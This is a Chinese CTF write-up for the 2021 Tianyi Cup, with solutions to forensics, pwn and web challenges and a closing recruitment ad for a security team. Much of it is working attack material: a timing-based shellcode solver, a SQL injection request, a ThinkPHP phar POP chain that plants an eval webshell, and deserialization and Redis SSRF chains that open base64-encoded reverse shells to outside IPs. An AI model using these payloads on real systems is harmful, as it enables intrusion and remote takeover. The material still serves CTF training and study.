2021 天翼杯ctf wp
- Misc
- 签到
- Browser
- Pwn
- ezshell
- Web
- eztp
- jackson
- easy_eval
- Tip
Misc
签到
群公告
FLAG
flag{e7gRR32wJJcHwQjwc2k9qFZ6fvn3gZ8P}
Browser
先是拿到
1.默认浏览器(请给出在注册表中可证明它是默认浏览器的对应的值,如:IE.HTTP)
一般都在注册表,耐心翻翻
./volatility -f /root/CTF/Browser.raw --profile=Win7SP1x86 hivelist
./volatility -f /root/CTF/Browser.raw --profile=Win7SP1x86 hivelist -o 0x8f484880
http://www.360doc.com/content/14/0216/23/13813789_353089973.shtml
看到追加到注册表的地址
然后去检索win7 的注册表
“Software\Microsoft\windows\Shell\Associations\UrlAssociations\http\Userchoice”
./volatility -f /root/CTF/Browser.raw --profile=Win7SP1x86 dumpfiles -Q
0x000000007da2abf0 -D ./
下载下来导入navicat
降序下然后就能看到
https://weibo.com/login.php
拼接
MSEdgeHTM_92.0.902.78_https://weibo.com/login.php
得到flag
Pwn
ezshell
from pwn import *
elf=ELF('./chall')
EXCV = context.binary = './chall'
context.arch='amd64'
def pwn(p, idx, c):
# open
shellcode = '''
push 0x3a; pop rdi; xor rbx,rbx;inc bl;shl rbx,0x10;add rdi,rbx; xor
esi, esi;
open:
push 2; pop rax; syscall;
cmp al,0x4
jl open
'''
# re open, rax => 0x14
# read(rax, 0x10050, 0x50)
shellcode += "mov rdi, rax; xor eax, eax; push 0x50; pop rdx; push 0x50;
pop rsi;add rsi,rbx; syscall;"
# cmp and jz
if idx == 0:
shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-3; ret".format(idx,
c)
else:
shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-4; ret".format(idx,
c)
shellcode = asm(shellcode)
p.recvuntil('======== Input your secret code ========\n')
p.send(shellcode.ljust(0x40-6, b'a') + b'./flag')
idx = 0
var_list = []
while(1):
for c in range(32, 127):
p = remote("47.104.169.149",25178)
# p=process('./chall')
pwn(p, idx, c)
start = time.time()
try:
p.recv(timeout=2)
except:
pass
end = time.time()
p.close()
if end-start > 1.5:
var_list.append(c)
print("".join([chr(i) for i in var_list]))
break
else:
print("".join([chr(i) for i in var_list]))
break
idx = idx + 1
print("".join([chr(i) for i in var_list]))
Web
eztp
www.zip源码泄漏
POST /public/ HTTP/1.1
Host: 8.134.37.86:26846
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0)
Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 100
Origin: http://8.134.37.86:26846
Connection: close
Referer: http://8.134.37.86:26846/public/index.php
Cookie: PHPSESSID=7la556p4v160a8j1nhcholth1d
username[0]=not like&username[1][0]=%%&username[1][1]=233&username[2]=)
union select 1,1#&password=1
注入登录进入后台
POP链
<?php
namespace think {
abstract class Model
{
protected $append;
protected $error;
public $parent;
}
}
namespace think\model {
use think\db\Query;
use think\Model;
use think\model\relation\HasOne;
use think\console\Output;
abstract class Relation
{
protected $query;
protected $selfRelation;
protected $parent;
protected $foreignKey;
protected $localKey;
}
class Pivot extends Model
{
public function __construct()
{
$this->append = ['mb' => 'getError'];
$this->error = new HasOne();
$this->parent = new Output();
}
}
}
namespace think\session\driver {
use think\cache\driver\File;
class Memcached
{
protected $handler;
public function __construct()
{
$this->handler = new File();
}
}
}
namespace think\cache\driver {
class File
{
protected $options;
protected $tag;
function __construct()
{
$this->options = [
'expire' => 3600,
'cache_subdir' => false,
'prefix' => '',
'path' => 'php://filter/convert.iconv.utf-8.utf7|convert.base64-
decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../../../../../
../../../var/www/html/public/uploads/a.php',
'data_compress' => false,
];
$this->tag = 1;
}
}
}
namespace think\db {
use think\console\Output;
class Query
{
protected $model;
public function __construct()
{
$this->model = new Output();
}
}
}
namespace think\console {
use think\session\driver\Memcached;
class Output
{
protected $styles;
private $handle;
public function __construct()
{
$this->styles = ['where'];
$this->handle = new Memcached();
}
}
}
namespace think\model\relation {
use think\Model\Relation;
use think\db\Query;
use think\console\Output;
abstract class OneToOne extends Relation
{
protected $bindAttr;
}
class HasOne extends OneToOne
{
public function __construct()
{
$this->selfRelation = 0;
$this->query = new Output();
$this->bindAttr = ['ccc', 'ccc'];
$this->foreignKey = 'ccc';
$o = new \stdClass();
$o->mb = 'ccc';
$this->parent = $o;
$this->localKey = 'mb';
}
}
}
namespace think\process\pipes {
use think\model\Pivot;
class Windows
{
private $files;
public function __construct()
{
$this->files = [new Pivot()];
}
}
}
namespace {
use think\process\pipes\Windows;
// echo urlencode(base64_encode(serialize(new Windows())));
$phar = new Phar("exp.phar"); //后缀名必须为 phar
$phar->startBuffering();
$phar->setStub('GIF89a' . '<?php __HALT_COMPILER();?>');
$object = new Windows();
$phar->setMetadata($object); //将自定义的 meta-data 存入 manifest
$phar->addFromString("1.php", ""); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
rename("exp.phar", "exp.jpg");
}
上传phar文件
使用listpic路由触发 phar反序列化
http://8.134.37.86:24954/public/?
s=admin/index/listpic&dir=phar:///var/www/html/public/static/img/person.jpg
写入shell后 读取flag
jackson
花生壳设置内网穿透安排恶意ldap服务
use exploit LDAPLocalChainListener
use payload CommonsCollections8
use bullet TransformerBullet
set lport 9001
set version 3
set args 'set args 'bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMzIuMjAxLjQ0Lzk5OTkgMD4mMQ==}|{base64,-
d}|{bash,-i}''
run
ysomap直接用上面的payload
中转到服务器上接到shell
easy_eval
反序列化
<?php
class a{
public $code = "system('cat /*;id');";
function __construct($code)
{
$this->code = $code;
}
}
class b{
function __construct($code)
{
$this->a = new a($code);
}
function __destruct(){
echo $this->a->a();
}
}
$c = new b('eval($_REQUEST[0]);');
echo serialize($c);
把redis的so扩展上传到/tmp目录下
用fsockopen发起ssrf 打redis
<?php
function Getfile($host, $port, $link){
$fp = fsockopen($host, intval($port), $errno, $errstr, 30);
if(!$fp){
echo "$errstr (error number $errno) \n";
}else{
$out = "$link";
//$out = "GET $link HTTP/1.1\r\n";
//$out .= "HOST $host \r\n";
//$out .= "Connection: Close\r\n\r\n";
//$out .= "\r\n";
fwrite($fp, $out);
$content = '';
while(!feof($fp)){
$contents .= fgets($fp, 1024);
}
fclose($fp);
return $contents;
}
}
$poc = "AUTH you_cannot_guess_it\r\n";
$poc .= "module load /tmp/exp.so\r\nsystem.rev 121.196.165.115 6663\r\n";
$poc .= "info\r\nquit\r\n";
var_dump($poc);
var_dump(Getfile("127.0.0.1","6379",$poc));
Tip
你是否想要加入一个安全团队
拥有更好的学习氛围?
那就加入EDI安全,这里门槛不是很高,但师傅们经验丰富,可以带着你一起从基础开始,只要你有持之以恒努力的决心。
EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事,我们在为打造安全圈好的技术氛围而努力,这里绝对是你学习技术的好地方。这里门槛不是很高,但师傅们经验丰富,可以带着你一起从基础开始,只要你有持之以恒努力的决心,下一个CTF大牛就是你。
欢迎各位大佬小白入驻,大家一起打CTF,一起进步。
我们在挖掘,不让你埋没!
你的加入可以给我们带来新的活力,我们同样也可以赠你无限的发展空间。
有意向的师傅请联系邮箱root@edisec.net(带上自己的简历,简历内容包括自己的学习方向,学习经历等)